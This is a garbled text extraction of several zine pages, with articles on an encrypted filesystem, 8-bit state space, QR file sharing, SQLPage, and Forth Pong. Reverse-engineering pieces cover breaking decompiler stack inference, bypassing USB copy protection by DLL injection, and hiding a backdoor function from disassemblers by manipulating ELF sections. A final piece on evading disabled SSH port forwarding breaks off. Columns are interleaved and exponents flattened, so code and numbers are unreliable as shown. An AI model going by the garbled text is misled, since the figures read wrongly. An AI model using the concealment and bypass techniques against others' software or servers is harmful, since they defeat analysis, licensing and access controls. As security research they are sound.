Rust is offering you. from plaintext offset to ciphertext block_index, and de-
crypt that block. We actually impl Seek on the same Read
STRUCTURE: I started with a simple one that keeps
struct. For seek on write it’s a bit more complicated, we
the files in inode structure, each metadata is stored in inodes
need to act as reader too. First, we need to decrypt the block,
dir in a file with inode’s name and in contents directory we
then write to it, and when at the end of the block encrypt
have files with inode’s name with the actual content of the
the block and write it to disk. Because Rust doesn’t have
file.
method overwriting, the code is not as clean as for the
MULTI-NODE: We must run in multi-node, as the
reader, where we only extend.
folder will be synced over several devices. The app could
WRITES-IN-PARALLEL: Using RwLock we allow
run in parallel or even offline. We must generate unique
reading and writing in parallel and we resolve conflicts with
inodes for new files. Solution is to assign an instance_id
WAL. It is particularly useful for torrent apps that write
as a random id to each device (or to set it by command arg,
different chunks in parallel, but also for DBs.
which is safer) and generate as instance_id | inode_seq,
STACK: See more https://github.com/radumarias/
where inode_seq is a sequence/counter for each device.
rencfs?tab=readme-ov-file#stack.
SECURITY: We do the same for nonce, instance_id
| nonce_seq. The sequences we keep in data_dir in a
per instance folder. To resolve the problem where user re-
stores a backup and hence would reuse nonces and reuses

Radu Marias
https://xorio.rs
Public Domain 41
Art Problematic communication

aliquid
X/Twitter: @_aaliquid
42 ArtStation: https://artstation.com/aliquid SAA-TIP 0.0.7
Understanding State Space with a Simple 8-bit Computer Programming

Understanding may think that the number of programs that can be im-
plemented is extremely small. You may be surprised by
State Space with a the answer.
Let’s start by computing the size of the computer’s
Simple 8-bit state space. To simplify the discussion, let’s only con-
sider the computer’s RAM. There are 256 bytes of mem-
Computer ory and each byte has 256 bit permutations, so the state
space of this computer is 256256 or 3.23*10616 states.
This is an amazingly large number of states. For com-
parison, it is estimated that there are only 1080 atoms
State space is an important concept in computer sci-
in the universe [3].
ence as it allows us to determine key fundamental limits
While state space gives us the upper bound of the
of a computational model. In binary computers, each
number of bit permutations RAM could be in, the com-
component of the computer can be represented by one
puter’s ISA severely restricts the number of valid pro-
or more binary digits or bits. The set of these compo-
grams that can be executed. I define valid programs
nents at any moment, represented by these bits, is the
as those constructed from implemented opcodes. Any
computer’s state. This state can change billions of times
opcode values not implemented are considered invalid.
per second as the computer executes code. State space
In order to calculate the upper bound of the number of
is the collection of all states the computer could ever be
valid programs that can be created with this computer,
in [1]. You may think that a computer could represent
we need to understand a bit more about this computer’s
an infinite number of states, but it is actually finite for
ISA. As mentioned, there are only 10 implemented op-
any computer we could build, though the state space is
codes. 8 of the opcodes require an operand byte that
very large as we will see.
could have 256 bit permutations. So, 8*28 + 2 opcodes
I have created a simple 8-bit computer, built within
that don’t need an operand = 2,050 valid instructions
Logisim (http://www.cburch.com/logisim/) to illus-
in the ISA. (We will ignore the fact that the two re-
trate. This simple 8-bit computer allows us to better
maining opcodes do actually require an explicit, padded
understand how computers function at the lowest level.
operand in this fixed-length ISA.) So, the upper bound
I have included the Logisim file and a Python emulator
of the number of valid programs is 2050128 , since we can
of this simple 8-bit computer at: https://github.com/
fit 128 two-byte instructions in the 256 bytes of RAM.
meuer26/Simple-8-bit-Computer .
This is 8.0*10423 valid programs.
Again, an amazingly large number of valid programs
for this simple 8-bit computer with 256 bytes of RAM.
Very large but finite. The state space of this com-
puter is 3.23*10616 and the number of valid programs
is 8.0*10423 . So, we can think of the ISA as a lower-
dimensional structure in the higher-dimensional state
space of the computer. It is also now clear that the
memory of the computer is what determines the state
space, while the ISA dictates what a valid program could
be. The number of valid programs necessarily must be
equal or smaller than the state space of the computer.
If this computer had a hard drive, the state space would
need to be computed based on the size of the hard drive
(since RAM could be swapped to the hard drive in that
scenario). I’ll leave it to the reader to compute the state
Figure 1: A Simple 8-Bit Computer space of their modern computer and the number of pos-
sibly valid programs based on their ISA.
This computer is a Von Neumann architecture and a
RISC machine. This computer’s Instruction Set Archi-
tecture (ISA) only has 10 implemented opcodes and yet References
it possesses the primary characteristics for Turing Com-
pleteness: (1) the ability to read and modify memory, [1] C. Moore and S. Mertens, The nature of computa-
(2) the ability to branch for program control (including tion. OUP Oxford, 2011.
conditional branching), and (3) the ability to do arith- [2] P. A. Laplante, “A novel single instruction computer
metic operations [2]. It is, therefore, capable of universal architecture,” ACM SIGARCH Computer Architec-
computation, or has the ability to implement any com- ture News, vol. 18, no. 4, pp. 22–26, 1990.
putable function (assuming enough memory). This as-
sumption of enough memory is a major distinction and [3] E. Babb, “Calculating the amount of dark energy
key to our understanding of state space. This simple in the universe using a novel space energy theory of
8-bit computer only has 256 bytes of memory, so you gravity,” Academia,(Just use Google).

Daniel O'Malley
X/Twitter: @binarywonder
SAA-TIP 0.0.7 43
Programming Using QR codes to share files directly between devices

Suppose you have a file / some data you’d like to share that cannot or should not
live on any machines other than the ones it is to be shared between. Perhaps:
● the data is sensitive
● the host has no network access
● there’s no computer at all! It’s just raw digital data IRL

There are plenty of options for transferring data, but in 2024, few are more
practical than QR codes. They are trivial to generate and display (hand draw one in the
dirt if you want!) and it is reported that a majority of Earth’s human inhabitants now
own a smartphone. I can’t confirm that all of those have QR scanners baked in, but
hopefully you’ll allow me to assume that most of them do. Point being: QR codes are cheap
and ubiquitous. They’re also content-agnostic, which is great! You can encode any chunk
of binary data as long as it fits within the 2,953 byte limit.

However, we hit a snag when we consider the “no internet” constraints defined above:
The default QR scanner apps on both iOS and Android desperately want to hand you off to
your web browser and pretty much force you to send your data to a third party before
letting you access it. In the best case, you’ve scanned an HTTP/S URL and website loads
or you’re deep-linked into a pre-installed app. In most other cases, you are prompted to
perform a web search with the contents of the QR code. iOS won’t even let you do that in
some cases - you cannot view/interact with a scanned data URL, for example. To work
around this, and to prevent potential file recipients from having to manually install a
custom scanner application, I’ve created a simple web app that parses the URL it was
accessed from as a base64-encoded file, and then hands the decoded version of that file
back to the accessor as a standard browser download:

<!DOCTYPE html>
<html>
<body>
<script>
function downloadBase64File(base64Data, filename) {
const ascii = atob(base64Data);
const bytes = new Array(ascii.length);
for (let i = 0; i < ascii.length; i++) {
bytes[i] = ascii.charCodeAt(i);
}
const byteArray = new Uint8Array(bytes);
const blob = new Blob(
[byteArray],
{ type: "application/octet-stream"}
);
const link = document.createElement("a");
link.href = URL.createObjectURL(blob);
link.download = filename;
// :P simulate a click to trigger download
document.body.appendChild(link); The QR code above contains a
link.click(); miniature PNG version of the Paged
document.body.removeChild(link); Out! logo. The data backing this
} version of the image only exists as
const params = new URLSearchParams(window.location.search); the black and white squares
// use fragment so data not sent to server rendered in this PDF - it is not
// idea: @[email protected] hosted on any other server (until
const data = window.location.hash.substring(1); you scan and download it, if you’re
// the filename used for the download should be feeling brave). Note that scanning
// passed in as a query param: 'f' will direct your browser to the web
const filename = params.get("f"); app over there <- (currently hosted
downloadBase64File(decodeURIComponent(data), filename); via Github Pages) but the image
</script> data itself should never leave your
</body> phone.
</html>

Some important notes:


1. You can host the code above statically as an HTML document on any web server you
have access to, and share a file by compiling a URL with the format:

https://{location of html file}?f={filename when downloaded}#{base64-encoded file data}

Once you have this URL, use your favorite QR code generator to QRify it.
2. The key here is that the file data is located in the URL fragment (the bit following
the ‘#’). URL fragments are (theoretically) only used by browsers and should not be
sent out with a network request. I encourage you to verify this yourself!
3. Yes, the device scanning your code will need internet access, but only to retrieve
the HTML file above. Again, we’re operating under the assumption that most people
are out in the world, scanning with their smartphones.
4. It was inspired by ‘Itty Bitty’: https://itty.bitty.site

Guy Dupont
Portfolio: https://www.guycombinator.net
44 Project Source: https://github.com/dupontgu/qr-file-share SAA-POOL 0.0.7
WebDev... in SQL ? Programming

WebDev… in SQL ?
$ sqlite3
sqlite> select introduction from article;

# A rebel's approach to web applications


Building a web application today generally means bringing in a backend framework, then a
frontend framework, and having thousands of dependencies before you even have a Hello World.

The tool I'd like to present here is a single executable le that lets you build full-stack applications
with nothing but… **SQL queries** !

sqlite> select answer from faq where question = 'That sounds like a terrible idea';

# Why it works
Yes, making a web page entirely in SQL sounds like heresy. But *SQLPage* makes it work by
providing **ready-to-use components** that take data in from your SQL queries, and produce nicely
styled HTML. It also exposes URL parameters and form elds as SQL prepared statement parameters.

For some applications, the traditional separation of frontend, backend, and database brings more
overhead than bene ts. By collapsing these layers into just SQL, SQLPage makes building web apps
accessible to people who don't have the time to learn the Javascript framework *du jour* every day.

Write a .sql le, connect your Postgres, MySQL, SQL Server, or SQLite db, and you have a website.

sqlite> select * from examples;

| code | result |
+------------------------------------+--------------------------------------------+
| select 'list' as component; | |
| select | |
| word as title, | |
| 'plus' as icon; | |
| from greetings; | |
| | |
+------------------------------------+--------------------------------------------+
| select 'form' as component; | |
| select Pet as name; | |
| | |
| insert into pets (name) | |
| select :Pet | |
| where :Pet is not null; | |
| | |
| select 'table' as component; | |
| select * from pets; | |
| | |
+------------------------------------+--------------------------------------------+

sqlite> select * from links;


| sql.datapage.app | github.com/sqlpage | youtube.com/@SQLPage | learnsqlpage.com |

Ophir Lojkine
https://x.com/ophir_dev
Public Domain https://ophir.dev 45
Retro Games retro and love if Forth code then

GAMES RETRO AND LOVE IF FORTH CODE THEN


If languages like FORTRAN and Algol-60 are dinosaurs1
that have left a huge imprint in the current computer land-
scape, then Forth deserves the respect of the venerable stro-
matolites. Coding in Forth is like watching life emerge from
the primordial soup.
Inspired by Thomas Petricek’s excellent The Lost Ways of
Programming 2 , the following is a Pong game coded in Durex-
forth 3 on the Commodore 64 through the Vice4 emulator.
Things to notice: a colon starts a word (function) definition
and a semicolon ends it; an @ means fetch and ! means write; player 1’s controls are w for up and s for down
(keys 87 and 83, respectively), and player 2’s are the up and down arrows (keys 145 and 17); RUN/STOP
(Esc, key 3) terminates the game. Finally, there are no abstract, pre-defined objects like points or lines, it all
comes together straight from the C64 memory map into something that looks like English at the end.

1 variable x variable y \ ball pos 46 then loop ;


2 variable dx variable dy \ ball dir 47 : game−over ( −− )
3 variable p1 variable p2 \ paddle pos 48 clear 10 times−down 15 times−right
4 variable s1 variable s2 \ scores 49 ." game over" cr 10 times−down
5 variable cmd \ game commands 50 to−lower quit ;
6 : update−command ( −− ) 51 : serve ( −− ) 20 x ! 12 y ! ;
7 key? invert 52 : p1−scores ( −− ) s1 @ 1+ s1 ! serve ;
8 if 0 cmd ! exit else key cmd ! then ; 53 : p2−scores ( −− ) s2 @ 1+ s2 ! serve ;
9 : pos! ( y x −− ) $030e c! $030d c! 54 : update−scores ( −− )
10 0 $030c c! 65520 sys ; 55 0 10 pos! s1 @ . 0 30 pos! s2 @ . ;
11 : clear 147 emit ; : quit−game? @ 3 = ; 56 : check−winner s1 @ 2 > s2 @ 2 > or
12 : to−upper 21 $d018 c! ; 57 if game−over then ;
13 : to−lower 23 $d018 c! ; 58 : p1−missed? ( −− )
14 : ms 0 do 10 0 do loop loop ; 59 x @ 0 = y @ p1 @ < and
15 : times−down 0 do 17 emit loop ; 60 x @ 0 = y @ p1 @ 4 + > and or
16 : times−right 0 do 29 emit loop ; 61 if p2−scores check−winner then ;
17 : blank 32 emit ; : ball 209 emit ; 62 : p2−missed? ( −− )
18 : l−pad 182 emit ; : r−pad 181 emit ; 63 x @ 38 = y @ p2 @ < and
19 : draw−pad−1 ( −− ) 64 x @ 38 = y @ p2 @ 4 + > and or
20 p1 @ 0 > 65 if p1−scores check−winner then ;
21 if p1 @ 1− 0 pos! blank then 66 : bounce ( −− )
22 5 0 do p1 @ i + 0 pos! l−pad loop 67 y @ x @ pos! blank update−x update−y
23 p1 @ 20 < 68 p1−missed? p2−missed? update−scores
24 if p1 @ 5 + 0 pos! blank then ; 69 draw−net x @ bounce−x y @ bounce−y
25 : draw−pad−2 ( −− ) 70 y @ x @ pos! ball 30 ms ;
26 p2 @ 0 > 71 : move−p1 ( k −− )
27 if p2 @ 1− 38 pos! blank then 72 dup 87 = if p1 @ 1− p1 ! drop else
28 5 0 do p2 @ i + 38 pos! r−pad loop 73 83 = if p1 @ 1+ p1 !
29 p2 @ 20 < 74 then then ;
30 if p2 @ 5 + 38 pos! blank then ; 75 : move−p2 ( k −− )
31 : reset−console ( −− ) 76 dup 145 = if p2 @ 1− p2 ! drop else
32 0 x ! 0 y ! 1 dx ! 1 dy ! 77 17 = if p2 @ 1+ p2 !
33 10 p1 ! 10 p2 ! 0 s1 ! 0 s2 ! ; 78 then then ;
34 : update−x ( −− ) x @ dx @ + x ! ; 79 : update−p1 ( a −− )
35 : update−y ( −− ) y @ dy @ + y ! ; 80 @ move−p1 p1 @ 0 max 20 min p1 ! ;
36 : bounce−x ( x −− ) 81 : update−p2 ( a −− )
37 dup 38 = if −1 dx ! 37 x ! drop 82 @ move−p2 p2 @ 0 max 20 min p2 ! ;
38 else 1 < if 1 dx ! 2 x ! 83 : pong
39 then then ; 84 clear reset−console to−upper
40 : bounce−y ( y −− ) 85 begin bounce draw−pad−1 draw−pad−2
41 dup 25 = if −1 dy ! 23 y ! drop 86 update−command
42 else 0 < if 1 dy ! 2 y ! 87 cmd update−p1 cmd update−p2
43 then then ; 88 cmd quit−game? until
44 : draw−net ( −− ) 89 clear to−lower ; pong
45 24 0 do i 2 mod if i 20 pos! l−pad
1 Figures from https://vectorportal.com 2 https://tomasp.net/commodore64 3 https://github.com/jkotlinski/durexforth
4 https://vice-emu.sourceforge.io, all URLs accessed on August 04, 2024.

Rodolfo García Flores &


Lauren S. Ferro
46 SAA-TIP 0.0.7
https://github.com/Karmaz95/Snake_Apple

The RE, VR, & ExpDev Newsletter

Your invite is here ....Join the club


Reverse Engineering About stack variables recognition and how to thwart it

About stack variables recognition and how to thwart it


Seekbytes

1 Introduction to local variable inference


However, the semi-naive algorithm can be easily exploited by
The secret art of reverse engineering is an imprecise one, built some actors whose goal is to break the decompilation. The trick
on tools that rely on very advanced techniques to be able to is to make the decompiler believe that it is using a very large
reconstruct the high-level code from a given executable file. Given area of the stack, when in fact that area is only the result of the
any instruction set architecture (known examples: Intel, ARM or decompiler’s overapproximation. The overapproximation comes
JVM), the real challenge is to recover the set of high-level elements from considering each branch as alive (i.e., the program could jump
that the compilation has removed or transformed. Example of at runtime even to the one considered dead). While in reality,
what the compiler removes may include: variable names, flow experience says that someone may create potential dead branches
control constructs, strings, and in general all the high-level details that will not be executed at run time, and thus the context created
not needed at the low level. does not take consideration of that branch.

In this article, I would like to talk about how most decom- To successfully inject an impossible index for the stack vari-
pilers manage to infer about the allocation of local variables within ables:
the function. As soon as the disassembly phase, which involves
transforming bytes into understandable instructions, is completed, 1. create a dead execution branch that will never be executed at
the decompiler begins its work by applying a series of fixed-point runtime (e.g., via conditions that we know are a priori, always
analyses, such as dataflow analysis (constant propagation, liveness), true or always false via opaque predicates).
and the time comes when it must try to reconstruct the local 2. mention access to a local variable placed in a very high or very
variables of a function. That is, figuring out which variables the low value of the stack base pointer in the branch never executed.
low-level code uses are allocated on the stack, destroyed as soon as
the subprocedure call returns the value. The stack is in fact used Note that this also works for values that go above the base of the
for three main purposes: to pass arguments from function callee stack pointer, i.e., the arguments (much also depends on how the
to function called, to allocate temporary variables that are valid stack is constructed, whether upward or downward). In addition to
only for the scope of the function, and to store the return address destroying local variables recognition, it is possible to cause the de-
that is retrieved when a return statement is encountered within the compiler to make very different assumptions about how arguments
function. are passed at runtime, making it almost impossible to recognize the
usual call conventions.
1 # define h u g e _ s p _ p r e d i c a t e _ f o r _ l o c a l _ v a r i a b l e s \
2 The semi-naive algorithm 2 __asm__ ( " push rax \ n " \ // mem [ sp ] = rax
3 " xor eax , eax \ n " \ // eax = eax ^ eax
4 " jz live_branch \ n " \ // is eax == 0?
The most common decompilers – including Binary Ninja, IDA, 5 " and ecx , [ rbp - 123456] \ n " // huge value
and Ghidra – may use a very naive version of the variable retrieval 6 " live_branch : \ n " \ // always true branch
algorithm that works based on index within the base pointer 7 " pop rax \ n " ) ; // rax = mem [ sp ]
8
register, also called BP-frame heuristic. It is much easier to write 9 # define h u g e _ s p _ p r e d i c a t e _ f o r _ a r g u m e n t s \
an example than to explain it: within the disassembly code, we 10 __asm__ ( " push rbx \ n " \ // mem [ sp ] = rax
have several mentions of the base stack pointer. Instructions of 11 " xor ebx , ebx \ n " \ // eax = eax ^ eax
12 " jz live_branch_2 \ n " \ // is eax == 0?
the type mov [ebp-0x14], eax are actually converted to simple 13 " and ecx , [ rbp + 123456] \ n " // huge value
MEM[ebp-0x14] = eax by an operation called lifting. This allows 14 " live_branch_2 : \ n " \ // always true branch
15 " pop rbx \ n " ) ; // rax = mem [ sp ]
the decompiler to be able to immediately say that what is pointed 16
to the address of ebp minus 0x14 must take the contents of the 17 // where needed
general register eax. When we find ebp - 0x14 or esp - 0x14, we 18 huge_sp_predicate_for_local_variables ;
19 huge_sp_predicate_for_arguments ;
are most likely referring to a local variable at address -0x14 named
in most cases var 14.
If you recognized the dead branch, fixing it is very simple for an
The decompiler recognizes that address in memory and assumes analyst in IDA: you can click the portion of the assembly code that
that a new variable has been declared within the ”hypothetical” you think is dead and with right-click use the Undefine option. An-
high-level source code. The decompiler runs through the entire other alternative is to manually edit the stack via the Edit function
instruction set of the basic blocks on which a function is built option, or change the heuristic for finding the local variables.
on. The algorithm keeps track of all the accesses on the stack:
for each new index it encounters on the stack, it allocates a new
variable whose type it does not yet know but knows that there
is a write/read at that address. The stack analysis algorithm is
thus completed by going to check where parameters are saved and
further checks are needed to ensure the analysis is sound (such
as stack balancement, and checking if there are any overlapping
variables).

3 Consequences of using the semi-naive al- Figure 1: The final result


gorithm If you are looking for a good way to dumbly destroy the inference
of the IDA decompiler, perhaps forcing people to look directly at
The consequences of using the semi-naive algorithm are that you
the assembly code and not start with the decompiler, you could
can freely manipulate the base pointer of the stack so that you
use this technique. This transformation has been used a lot in
can trick the decompiler into thinking that there are variables or
obfuscating binaries such as Apple Fairplay, where the combination
arguments where in fact there are none. The decompilers build part
of local variables allocated to very large stack offsets and arguments
of the later stages on the fact that they can have a crystal-clear
partly destroyed static analysis. As an exercise left for the reader,
view of the stack and somehow infer elements on the stack because
someone might want to understand if this can be applied also to
by default speaking about the size, the stack should be no larger
SP-based heuristic.
than 1MB, allowing a fast analysis.

Seekbytes
https://nicolo.dev
48 https://twitter.com/nicolodev SAA-ALL 0.0.7
Examining USB Copy Protection Reverse Engineering

Examining USB So far it holds the line. I reviewed all the info I had
and listed a few options to try. I can reverse engineer
Copy Protection the application and figure out how it works. This is defi-
nitely going to work, but it can be very time-consuming.
I can also hook the kernel32!ReadFile API and dump the
A while ago, a friend of mine asked me whether it is content as they are read. But if the PDF reader does
possible to prevent people from copying the files on a not read all of the file at once, my dump would be in-
USB thumb drive. Specifically, the files are PDFs and complete.
are his intellectual work. He wishes that people could The core problem is that the PDF reader is reading
read them, but could not copy them to another location, the file just fine, but I cannot read it using another tool.
e.g., the hard drive of a computer. What could be making the difference? I made some edu-
In other words, he wants a DRM solution. Intuitively, cated guesses and figured it is likely that the application
his goal is hard to achieve, since being able to view the is enforcing some access controls on it. Maybe it checks
files means the PDF reader can access the content of the whether the process that tries to read the file is a sub-
file, and there is no easy way to prevent it from writing process of itself, or it validates the path of the requesting
it elsewhere. Encrypting the files is not enough, since process, etc. There are plenty of ways to do it.
the files still have to be decrypted before the PDF reader Soon, I had an Eureka moment – regardless of the
can process them. actual access control policy, we know the PDF reader is
allowed to read the file. If we inject our code into it,
then it is very likely it just works. I quickly wrote some
1 How does it work? simple code to read the file and write it to a different
location.
I purchased one of the USB copy protection solutions I compiled it into a DLL and injected it into the PDF
and the product looks like a regular thumb-drive (and it reader process with Cheat Engine. And it works – the
is!). I inserted it into my computer and found an appli- file is successfully copied to the hard drive!
cation on it. I launched it and it asked me to configure
an admin password and a guest password. Then it pre-
sented an explorer-like GUI that allows me to add files 3 Remarks
into it. The idea is that I use the admin password to
add files into it, ship the drive to the user, who uses the Now that we have broken the myth of the USB copy
guest password to view the files. protection – let us think from the other side and see
I added a “test.pdf” into the root directory of the whether the protection can be improved. Though I do
drive. Files added into the drive are invisible in the not know how it works exactly, let us just assume it uses
Windows explorer, and can only be accessed using the the above mentioned access control policy and validate
application that comes with the drive. When the file is the file access requests. First of all, it can harden the
double-clicked, a PDF reader is launched and it opens PDF reader to make DLL injection harder, or, when a
the file. It is not the PDF reader on my computer – DLL injection is detected, reject the access.
the PDF reader comes with the drive. And it is rigged, Going deeper, the core issue is the file gets decrypted
so that the “Save As” option (among others) is missing too early. There is a clear boundary of encrypted and
from the menu. There is also no way to open the PDF decrypted file at the process level. In other words,
using an external reader that I can control. the manager application decrypts the file, and the PDF
I played around for a while and I did not see a triv- reader reads the original unencrypted file. This bound-
ial way to defeat it. I then checked the command line ary is so vulnerable and easily exploited. If it can move
arguments of the PDF reader, and I see it reads a file the decryption logic into the PDF reader, and decrypt
“Z:\test.pdf”. I suspect the “Z:\” drive is emulated by the file on the fly right before it gets parsed, then my
the application, and whenever someone tries to access a method will fail (it can only read the encrypted file).
file in it, the application kicks in and provides the appro- That said, these would not be easy to implement. Not
priate content. Something like this can be implemented only it starts getting closer to an anti-cheat/DRM so-
via minifilter 1 drive, though I do not know if it is the lution, it also means doing extensive modifications to
case for this particular product. the PDF reader, which makes the entire solution signif-
icantly more complex.
In the end, I presented my research to my friend and
2 Let us break it! explained that while the copy protection can be circum-
vented, it is still an option because the attack is be-
The first thing I tried is – can I access the file using its yond an average user. I also suggested a different solu-
path directly? I tried to copy it in PowerShell, or open tion based on watermarking, i.e., adding invisible water-
it with a normal PDF reader on my computer. Both marks on the PDFs (e.g., on the images), and each copy
failed. I got access denied on it. has a different watermark which can be used to identify
1 https://learn.microsoft.com/en-us/windows-hardware/ the leaker in the case of a leak. Still, it would not be
drivers/ifs/about-file-system-filter-drivers perfect – as is always the case with DRM.

Xusheng Li
https://xusheng.dev/
SAA-ALL 0.0.7 49
Reverse Engineering Lying with Sections

Lying with ELF Sections And compile it like this:


A big thanks to bluec0re without whom this project # Omit .eh_frame to fool Ghidra
would not have been possible. gcc -fno-asynchronous-unwind-tables \
Create the following C-code: -o ex2.pre example2.c
#include <stdio.h> # Store the orginal .init to use as decoy
__attribute__((section (".s2"))) objcopy --dump-section .init=i1.bin ex2.pre
int function2(void) { # Create backdoor trampoline
puts("Function 2"); ADDR1=$(nm ex2.pre | grep '\bbackdoor\b' | \
} awk '{print "0x" x $1}')
__attribute__((section (".s1"))) ADDR2=$(objdump -j .init -h ex2.pre | \
int function1(void) { awk '/\.init/ { print "0x" x $4 }')
puts("Function 1"); JUMP=$(printf "%#x" $(($ADDR1-$ADDR2)))
} cat > init_redirect.asm <<EOF
int main() { BITS 64
function1(); call \$+$JUMP
} ret
EOF
And compile it like this: nasm -fbin -oi2.bin init_redirect.asm
# Insert the trampoline and decoy
gcc -o example1.pre example1.c objcopy --update-section .init=i2.bin \
S1=$(objdump -j .s1 -h example1.pre | \ --rename-section .init=.xinit \
awk '/.s1/ { print "0x" x $4 }') --add-section=.init=i1.bin \
objcopy --change-section-vma .s2=$S1 \ --set-section-flags .init=alloc,code \
example1.pre example1 --change-section-vma .init=$ADDR2 \
ex2.pre example2
Running this program prints “Function 1”. However, if strip -s example2 -o example2.strip
you open this in IDA Pro1 , it will show the following:
Running example2 outputs “Backdoor!” and “Hello
int main() {
World!”. Opening this in IDA Pro shows a normal
function2();
looking “ init proc” function and even if we manually
}
check the backdoor function no cross-references to it
Clicking the function call still shows the correct func- are found. With some code changes, we might even be
tion, so this isn’t a big deal, but it tells us something able to prevent the IDA sweeper from finding the func-
about how IDA is operating. Both Binary Ninja2 and tion at all. This now also fools Ghidra which shows
Ghidra3 get it right. you a completely normal “ DT INIT”. In fact, Ghidra
does not even identify the backdoor function as code at
Abusing .init all. Depending on how you interpret it, even objdump
output can be misleading here since it shows disassem-
The above example suggests that some tools might over- bly of both the original “.init” and the detour at the
rely on sections to inform them. However, the dis- same virtual address. Binary Ninja still shows correct
assembly and decompilation of the code remains cor- output.
rect. Can we still use this to do something tricky?
Apart from things like code and data, ELF binaries Analysis
have various other sections of interest. The “.init” sec-
tion contains code that is executed before main by the Why does this work? We just said that the “.init” sec-
“ libc start main” function. Let’s get tricky. Create tion is special. If we rename it to something else, then
the following C-code: it should no longer be executed. It turns out that this
is an outdated description of the situation. Reading the
#include <stdio.h> glibc source code reveals this comment:
int main() {
Note: The init and fini parameters are no
puts("Hello World!");
longer used ... For dynamically linked exe-
return 0;
cutables, the dynamic segment is used to lo-
}
cate constructors and destructors ...
void backdoor() {
puts("Backdoor!"); Indeed, in the segment containing the “.dynamic” sec-
} tion, we find a table where one of the entries is the pair
1 IDA version 8.4.240527 (DT INIT,0x1000) and this is the virtual address of the
2 Binary Ninja version 4.2.6016-dev init function. This is what the decompilers should use to
3 Ghidra version 11.1.2 determine where the init function is, not section names.

Calle "ZetaTwo" Svensson


https://zeta-two.com
50 Twitter: @ZetaTwo SAA-TIP 0.0.7
Revitalizing Binaries Reverse Engineering

Revitalize!
The Revitalize approach offers most of the
advantages of full recompilation but for a fraction of
the effort. The big idea: keep most of the code the
same, but replace just a few definitions with
decompiled versions.
Project Ironfist, a game mod for Heroes of Might and
Magic II, created with Revitalize. www.ironfi.st The first step is to “unlink” a program by turning it into
a disassembly where all function and global variable
Revitalizing Binaries addresses are replaced by names. IDA can basically do
this, except that it uses its own dialect of assembly
So you have an old program and you want it to have that needs patching to be reassembled. But the magic
some new features, but you don’t have the source comes from making the assembly look like this:
code. What can you do?
IFDEF IMPORT_?SomeFunc@@namemangling
This article is a crash course on binary modification, ?SomeFunc@@namemangling PROTO SYSCALL
ELSE
the techniques used by hackers, game modders, and
?SomeFunc@@namemangling proc near SYSCALL
retro software enthusiasts to change software they <function definition>
don’t control. I’ll explain the main ways people do it. END
But also I’ve worked on a rare approach to binary
modification that I call Revitalize. I don’t think it’s that
That’s Microsoft Macro Assembly for “if a flag is set,
hard, but I’ve found almost no instances of anyone
declare SomeFunc as defined elsewhere, else define it
doing similar. Yet I think it has the best ROI for a lot of
here.” What does this let you do? Well, in a related file,
use-cases. I explain it here for the first time.
you write IMPORT_?SomeFunc@@namemangling=1.

How to modify binaries? Then you write a new SomeFunc in C/C++. And
suddenly all the old code uses your new SomeFunc
instead of the existing one. You can also have it
There are three main ways to modify a program
generate a copy of the original SomeFunc, so that your
without its source. The simplest is binary patching,
new SomeFunc can just wrap the old behavior.
where you just open the program in a hex editor. For
example, changing 0x0F84 to 0x0F85 swaps two
The first thing this lets you do is modify existing
if-branches. Done in the right place, it can let you run
functions in the same way as DLL injection, except
a program that checks for a physical CD on a laptop
that, after generating the specially-formatted
without a CD drive. Or if you find the table that says
disassembly, it’s mostly like normal programming in a
how many hit points each unit has, you can just
normal IDE. But the really cool thing is this also works
change it. But you can’t make the program bigger, so
for static data structures. Say your game has an array
you can’t really add new features – unless you find
defining the stats and assets of all the 70 unit types in
some unused bytes in the binary (a code cave).
the game, and you want to add a new unit. If you had
the original code, you would just edit the array and
The second is to DLL Injection: loading code alongside
add a new entry. Binary patching and DLL injection
the existing process that tweaks it somehow.
can’t do this. But with Revitalize, one simply types
Commonly, the new code will hot-patch some
IMPORT_?globalUnitsArray@@namemangling=1,
function by overwriting it in memory to jump to some
and then you can copy the decompiled array into a
new code, placed in freshly allocated memory. This is
C++ file, and modify it as easily as if you had the
enough to add major new features, and is done by
original code.
everything from Cheat Engine to the Magisk and Cydia
engines used to “tweak” jailbroken mobile devices.
And that’s basically it! You pretty much just need a
copy of IDA and a script to output a disassembly in
The third is to decompile and recompile the entire
this special format, which you can find at
program. But this is really hard. Decompilers today
https://tinyurl.com/binaryrevitalize. There are a few
are imperfect, and doing this requires manually
extra steps that won’t fit here, but I’ll happily coach
changing the entire program to get it to re-compile.
anyone interested in trying this.
Lots of room to add bugs.

Jimmy Koppel Project website: www.ironfi.st


Project Github: https://github.com/jkoppel/project-ironfist/
LinkedIn: https://www.linkedin.com/in/james-koppel-ph-d-0527b654/
CC BY 4.0 Blog: pathsensitive.com
X/Twitter: @jimmykoppel
51
Art School.pt3
aliquid
X/Twitter: @_aaliquid
52 ArtStation: https://artstation.com/aliquid SAA-TIP 0.0.7
Circumventing Disabled SSH Port-Forwarding with a Multiplexer Security/Hacking

Circumventing Disabled Introducing .yamuxfwd:


. . . . . . . . . . . a simple yamux CLI utility I
cobbled up in 20 minutes with ChatGPT. yamuxfwd
SSH Port-Forwarding with has two modes of operation:
a Multiplexer • Listen mode - execute a child process, establish
yamux multiplexing with the child process over
We’ve all been there. You’re preparing to SSH to that stdin/stdout. Listen for TCP connections, open a
obscure production server to debug some issue, ready new yamux channel for incoming TCP connections
to port-forward the misbehaving service. Then you are and pipe traffic between the channel and the TCP
greeted by the following message: connection
% ssh server -D 1337 • Connect mode - to be eventually launched by the
$ channel 3: open failed : a d m i n i s t r a t i v e l y prohibited :
open failed
listen mode’s child process. Establish the other
end of yamux over stdin/stdout, wait for new
Basically you understand that the server’s sshd is yamux channels, dial TCP connection to a
configured to deny port forwards by disabling destination server passed via CLI args, pipe traffic
GatewayPorts,AllowTcpForwarding in sshd config(5). between the channel and its designated outgoing
Say we can’t modify sshd config, can we find another TCP conn.
way to tunnel to that service?
Here’s how to use yamuxfwd to construct a simple
SSH Internals Primer port-forward pipeline: Run both ends of yamuxfwd
(listen/connect) through SSH. As new connections
